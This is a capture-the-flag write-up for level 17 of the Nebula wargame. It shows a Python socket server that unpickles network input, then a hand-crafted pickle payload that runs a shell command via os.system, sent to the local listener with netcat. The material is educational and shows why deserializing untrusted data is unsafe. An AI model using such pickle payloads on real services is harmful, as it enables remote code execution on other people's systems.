Level17 dictates, “There is a python script listening on port 10007 that contains a vulnerability.”
Python! Nice. The nebula war game is using a variety of languages, which is fantastic. We are provided with the following source code:
#!/usr/bin/python import os import pickle import time import socket import signal signal.signal(signal.SIGCHLD, signal.SIG_IGN) def server(skt): line = skt.recv(1024) obj = pickle.loads(line) for i in obj: clnt.send("why did you send me " + i + "?\n") skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) skt.bind(('0.0.0.0', 10007)) skt.listen(10) while True: clnt, addr = skt.accept() if(os.fork() == 0): clnt.send("Accepted connection from %s:%d" % (addr, addr)) server(clnt) exit(1)
I won’t spoil it, but I learned about pickle over at pythonchallenge.com. Do some additional research if you are not familiar with it.
The majority of the information on pickle will present you with this warning:
Warning The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
Never trust the user :)
Let’s craft some malicious data:
level17@nebula:~$ cat foo cos system (S'getflag > /home/flag17/output' tR.
This data, when deserialized, instructs the system to run ‘getflag > /home/flag17/output’. Let’s direct it at the listener using netcat.
level17@nebula:~$ nc localhost 10007 < foo Accepted connection from 127.0.0.1:44614^C level17@nebula:~$ cat /home/flag17/output You have successfully executed getflag on a target account
Woo, on to the next level!